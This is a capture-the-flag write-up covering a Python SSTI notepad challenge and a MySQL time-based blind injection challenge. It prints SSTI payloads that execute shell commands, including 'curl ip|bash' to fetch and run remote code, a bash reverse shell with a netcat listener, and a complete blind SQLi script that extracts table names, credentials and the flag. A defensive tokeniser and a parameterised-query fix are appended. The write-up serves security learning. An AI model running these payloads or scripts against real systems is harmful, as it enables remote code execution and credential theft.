Author: wh1sper@星盟
Level – Week3 Forgetful. Key point: simple Python SSTI
The challenge is a notepad. The description field is vulnerable to SSTI when you add a note, and on the view page you can see that the SSTI fired:
The most conventional payloads:
```python
{{[].__class__.__mro__[1].__subclasses__()}}
{{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('ls /').read()}}
{{[].__class__.__mro__[1].__subclasses__()[167].__init__.__globals__.__builtins__.__import__('os').popen('curl ip|bash').read()}}
```
Because the command-execution point sits behind a WAF, a reverse shell can be used directly:
```bash
nc -lvnp 8888
bash -i >& /dev/tcp/ip/8888 0>&1
```
The technique is fairly conventional.
Here is a script for locating a module's index in the output of [].__class__.__mro__[1].__subclasses__():
```python
# python 3
import re

# Paste the echoed __subclasses__() output between the quotes.
echoed = '''
[echoed output]
'''

# The echo is a comma-separated list of classes, so splitting on ','
# gives one entry per class; the list index is the subclasses() index.
classes = re.split(',', echoed)
for i in range(0, len(classes)):
    if 'catch_warnings' in classes[i]:
        print(i)
        break
```
iki-Jail. Key point: MySQL injection, single-quote escaping
The familiar login box, the familiar SQL injection.
The username field turned out to require an email address, and with Burp intercepting, some problems appeared that stopped the Ajax from working.
So I sent requests to login.php directly from Burp.
After some simple fuzzing, the filter is as follows:
Since single and double quotes are filtered, the idea is to escape the single quote instead. When we enter admin\ as the username, the statement becomes:
```sql
SELECT * FROM user WHERE username='admin\' AND password='xxx'
```
The backslash escapes the closing quote of the username, so xxx is executed as SQL, which gives us the injection.
It turned out that only time-based injection works:
exp:
```python
# python3, wh1sper
import requests
import time

host = 'https://jailbreak.liki.link/login.php'


def mid(bot, top):
    return int(0.5 * (top + bot))


def transToHex(flag):
    res = ''
    for i in flag:
        res += hex(ord(i))
    res = '0x' + res.replace('0x', '')
    return res


def sqli():
    name = ''
    for j in range(1, 200):
        top = 126
        bot = 32
        # Binary search on the ASCII value of character j of the selected value.
        while top > bot:
            babyselect = '(database())'  # week3sqli
            babyselect = "(select group_concat(table_name) from information_schema.TABLES where table_schema like database())"  # u5ers
            babyselect = "(select group_concat(column_name) from information_schema.columns where table_name like 0x7535657273)"  # usern@me,p@ssword
            babyselect = "(select `p@ssword` from week3sqli.u5ers)"  # sOme7hiNgseCretw4sHidd3n
            babyselect = "(select `usern@me` from week3sqli.u5ers)"  # admin
            payload = "^(if((ascii(substr({},{},1))>{}),1,sleep(2)))#".format(babyselect, j, mid(bot, top))
            data = {
                # Trailing backslash escapes the closing quote of the username.
                "username": "admin\\",
                # Spaces are replaced with inline comments to get past the filter.
                "password": payload.replace(' ', '/**/')  # ^(if((ascii(1)>55),sleep(3),sleep(3)))# this one did delay as expected
            }
            try:
                start = time.time()
                r = requests.post(url=host, data=data)
                print(data)
                print(time.time() - start)
                if time.time() - start < 1.5:
                    bot = mid(bot, top) + 1
                else:
                    top = mid(bot, top)
            except requests.RequestException:
                continue
        name += chr(top)
        print(name)


if __name__ == '__main__':
    sqli()
# hgame{7imeB4se_injeCti0n+hiDe~th3^5ecRets}
```
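To show why the quote filter above is not enough, here is an added example (my own code, not part of the write-up) that emulates the filter as described, builds the query the same way, and tokenises it the way the MySQL lexer would (backslash escapes, '' doubling, # line comments). It reports whether user input ended up outside a string literal; the table name, the filter and the password value are assumptions.

```python
def strip_quotes(value):
    """Constructed emulation of the challenge filter: quotes removed, backslash kept."""
    return value.replace("'", "").replace('"', "")


def build_login_query(username, password):
    """Vulnerable string-built query as the write-up shows it (hypothetical table)."""
    return "SELECT * FROM user WHERE username='%s' AND password='%s'" % (
        strip_quotes(username), strip_quotes(password))


def tokenize_mysql(sql):
    """Split a statement into ('code'|'str'|'comment', text) pieces, honouring
    backslash escapes inside single-quoted literals and '#' line comments."""
    pieces, buf, i, in_str = [], "", 0, False
    while i < len(sql):
        c = sql[i]
        if in_str:
            if c == "\\" and i + 1 < len(sql):          # \x keeps x inside the literal
                buf += sql[i + 1]; i += 2; continue
            if c == "'" and sql[i + 1:i + 2] == "'":    # '' is a literal quote
                buf += "'"; i += 2; continue
            if c == "'":
                pieces.append(("str", buf)); buf, in_str = "", False
            else:
                buf += c
        elif c == "#":                                  # rest of the line is a comment
            pieces.append(("code", buf)); pieces.append(("comment", sql[i:]))
            return pieces
        elif c == "'":
            pieces.append(("code", buf)); buf, in_str = "", True
        else:
            buf += c
        i += 1
    pieces.append(("str" if in_str else "code", buf))
    return pieces


def executable_sql(username, password):
    """Everything that is NOT inside a string literal, i.e. what MySQL will execute."""
    return "".join(t for k, t in tokenize_mysql(build_login_query(username, password)) if k == "code")


BASELINE = executable_sql("alice", "hunter2")   # benign input: only the template is code


def input_became_code(username, password):
    """True when the executed SQL differs from the template, i.e. input escaped the literal."""
    return executable_sql(username, password) != BASELINE


def safe_login_query():
    """The fix: a placeholder query whose values are bound by the driver, never spliced in."""
    return "SELECT * FROM user WHERE username=%s AND password=%s"
```

A quote-based attempt stays inside the literal because the filter strips it, while the trailing backslash turns the closing quote into data and pushes the whole password value into SQL code.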
Arknights. Key point: PHP deserialization